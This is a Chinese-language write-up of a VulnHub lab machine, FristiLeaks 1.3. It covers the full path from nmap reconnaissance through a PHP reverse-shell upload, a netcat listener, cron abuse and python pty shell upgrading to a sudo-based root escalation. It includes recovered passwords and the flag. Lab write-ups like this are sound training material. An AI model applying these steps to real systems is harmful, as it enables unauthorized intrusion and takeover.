vulnhub靶机练习之FristiLeaks_1.3

探测靶机

首先修改虚拟机的mac地址。vmware修改虚拟机MAC地址的方法

记得，虚拟机要改成NAT模式。
靶机IP为：192.168.80.21

kali@kali:~$ sudo arp-scan -l
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1    00:50:56:c0:00:08       VMware, Inc.
192.168.80.2    00:50:56:fc:96:a7       VMware, Inc.
192.168.80.21   08:00:27:a5:a6:76       PCS Systemtechnik GmbH
192.168.80.254  00:50:56:e0:3c:3f       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.109 seconds (121.38 hosts/sec). 4 responded

nmap扫描

扫描发现靶机开放了80端口，并且robots.txt拒绝爬取/cola、/sisi、/beer这三个路径。

kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 00:30 EST
Nmap scan report for 192.168.80.21
Host is up (0.00081s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.81 ms 192.168.80.21

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.40 seconds

访问这些路径，发现打开都是这一张图片。
http://192.168.80.21/cola/
http://192.168.80.21/sisi/
http://192.168.80.21/beer/

拓展知识：

用curl查看http请求头详情信息：

kali@kali:~$ curl http://192.168.80.21/sisi/ -v
*   Trying 192.168.80.21:80...
* TCP_NODELAY set
* Connected to 192.168.80.21 (192.168.80.21) port 80 (#0)
> GET /sisi/ HTTP/1.1
> Host: 192.168.80.21
> User-Agent: curl/7.67.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 06 Mar 2020 13:42:59 GMT
< Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
< Last-Modified: Wed, 25 Nov 2015 09:11:42 GMT
< ETag: "3225-21-52559d8c3444b"
< Accept-Ranges: bytes
< Content-Length: 33
< Connection: close
< Content-Type: text/html; charset=UTF-8
< 
<img src="/images/3037440.jpg"/>
* Closing connection 0

登录系统

目录爆破（暂时没有爆破出来;)）得到网站登录入口地址：http://192.168.80.21/fristi/
查看网页源码，提示我们：用户ezeepz用户的密码在base64字符串里面。


我们将base64字符串解码存为png图片。

kali@kali:~$ echo 'iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0klS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+fm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvbDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNdjJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg104VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLqi1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2FgtOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HKul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12qmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFheEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==' | base64 -d > evidence-6.png

打开这个图片，获得用户密码是：keKkeKKeKKeKkEkkEk

使用获取到的用户和密码（eezeepz/keKkeKKeKKeKkEkkEk），登录到系统：

php反弹shell

kali自带的webshell脚本位于/usr/share/webshells/php，我们修改这个php-reverse-shell.php。IP改为靶机IP（192.168.80.14），端口改为靶机监听端口（6666）。

上传php-reverse-shell.php至靶机之后，访问url：http://192.168.80.21/fristi/uploads/php-reverse-shell.php.png 即可进入apache用户的shell。

kali@kali:/usr/share/webshells/php$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.80.14] from (UNKNOWN) [192.168.80.21] 43835
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 10:19:44 up  1:55,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell

sh-4.1$ ccdd  eeeezzeeeeppzz

sh-4.1$ llss

MAKEDEV
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic
sh-4.1$ ccaatt  nnootteess..ttxxtt

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

进入/temp目录，新建文件runthis设置计划任务（这个计划任务每分钟执行），修改/home/admin的权限为777，使得ezeepz可访问admin目录的内容。

sh-4.1$ ccaatt  rruunntthhiiss

/home/admin/chmod 777 /home/admin

于是，/home/admin目录已具备777权限，ezeepz可访问admin目录的内容。

sh-4.1$ llss  --ll

total 20
drwxrwxrwx. 2 admin     admin      4096 Nov 19  2015 admin
drwx---r-x. 5 eezeepz   eezeepz   12288 Nov 18  2015 eezeepz
drwx------  2 fristigod fristigod  4096 Nov 19  2015 fristigod

进入admin目录，发现以下内容：

h-4.1$ ccdd  aaddmmiinn

sh-4.1$ llss

cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt

关键的文件：cryptedpass.txt、cryptpass.py、whoisyourgodnow.txt。这两个txt是密文，而py文件是加密算法实现方式。
我们根据这个py文件，反推出解密算法程序：

kali@kali:~$ cat decryptpass.py 
#Wrote this simple function to solve the CTF designed for FristiLeaks v1.3 VulnHub VM
#!/usr/bin/python
import base64,codecs,sys

def decodeString(str):
    decode = codecs.decode(str[::-1], 'rot13')
    return base64.b64decode(decode)

cryptoResult=decodeString(sys.argv[1])
print cryptoResult

解密结果：

登入fristigod用户并提权

使用密码登录fristigod用户：

sh-4.1$ ssuu  --  ffrriissttiiggoodd

standard in must be a tty

这里无法登录fristigod用户，要进入完全shell模式。
拓展知识：

sh和bash的区别
/bin/sh相当于/bin/bash --posix，sh跟bash的区别，实际上就是bash有没有开启posix模式的区别。

h-4.1$ ppyytthhoonn  --cc  ''iimmppoorrtt  ppttyy;;ppttyy..ssppaawwnn((""//bbiinn//bbaasshh""))''

bash-4.1$ ssuu  --  ffrriissttiiggoodd

Password: LetThereBeFristi!

-bash-4.1$ wwhhooaammii

fristigod

登入fistigod用户之后，查看命令历史：

-bash-4.1$ ppwwdd

/var/fristigod
-bash-4.1$ llss  --llaa

total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff
-bash-4.1$ ccaatt  ..bbaasshh   _history 

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

发现fristigod这个用户使用sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom这条命令进行操作，似乎能进入root权限。
我们试一下这条命令：sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id，果然拿到了root权限：

-bash-4.1$ ssuuddoo  --uu  ffrriissttii  //vvaarr//ffrriissttiiggoodd//..sseeccrreett__aaddmmiinn__ssttuuffff//ddooCCii^oomm  iidd

uid=0(root) gid=100(users) groups=100(users),502(fristigod)

于是进入root的shell终端，拿到flag：Y0u_kn0w_y0u_l0ve_fr1st1。

-bash-4.1$ ^[[Asudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id^^//bbiinn//bbaasshh

bash-4.1# ccdd  //rroooott

bash-4.1# llss

fristileaks_secrets.txt
bash-4.1# ccaatt  ffrrii        stileaks_secrets.txt 

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1


bash-4.1# wwhhooaammii

root

总结

主要学习利用本地文件上传漏洞，上传php反弹shell脚本（kali自带的webshell脚本）。
python -c 'import pty;pty.spawn("/bin/bash")'这条命令可以将不完全的shell变为完全shell。
通过命令历史，找到提权的方式。

参考博文

https://kongwenbin.wordpress.com/2017/12/31/write-up-for-fristileaks-v1-3-vulnhub/